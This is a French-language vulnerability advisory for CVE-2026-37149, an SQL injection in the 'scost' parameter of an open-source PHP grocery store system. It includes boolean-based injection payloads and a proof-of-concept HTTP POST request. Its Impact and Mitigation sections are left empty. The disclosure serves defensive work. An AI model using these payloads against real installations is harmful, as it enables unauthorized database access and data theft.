
CVE-2026-37149 - Vulnérabilité d'injection SQL dans le paramètre scost de search_products.php dans GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
CVE-2026-37149 Injection SQL dans GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
Aperçu
Identifiant CVE : CVE-2026-37149 Type de vulnérabilité : Injection SQL (CWE-89) Sévérité : Élevée Découvreur : Dhyey Patel
Description
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contient une vulnérabilité d'injection SQL dans le paramètre « scost » de « /grocery/search_products.php ».
L'application ne parvient pas à valider correctement les entrées fournies par l'utilisateur avant de les intégrer dans des requêtes SQL. Un attaquant peut injecter des expressions SQL conçues via le paramètre vulnérable et manipuler les requêtes de la base de données sous-jacente.
Une exploitation réussie peut permettre un accès non autorisé à des informations sensibles de la base de données et l'exécution d'instructions SQL arbitraires.
Produit concerné
Produit : GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
Version : v1.0
Dépôt du fournisseur :
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Composant concerné
Type d'attaque À distance
Informations sur le fournisseur Projet open-source maintenu par le propriétaire du dépôt : https://github.com/anirudhkannanvp
Détails techniques
La vulnérabilité a été confirmée à l'aide de techniques d'injection SQL basées sur les booléens.
Charge utile pour condition VRAIE
-1 OR 321=6 AND 000483=000483 --
Charge utile pour condition FAUSSE
-1 OR 320=6 AND 000483=000483 --
Les réponses de l'application différaient selon que la condition injectée était évaluée à VRAI ou FAUX, confirmant l'injection SQL.
Des tests supplémentaires ont confirmé l'exécution réussie de fonctions SQL, notamment :
SELECT database()
Le nom de la base de données renvoyé était :
grocery
Cela démontre que des requêtes SQL arbitraires peuvent être exécutées via le paramètre vulnérable.
Preuve de concept
Requête
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Résultat
La réponse change en fonction de la condition booléenne injectée, confirmant l'injection SQL dans le paramètre « scost ».
Impact
Les impacts potentiels incluent :
Atténuation
Les développeurs devraient :
Références Injection SQL OWASP https://owasp.org/www-community/attacks/SQL_Injection
Programme CVE MITRE https://www.cve.org
Crédits Découvert et signalé par : Dhyey Patel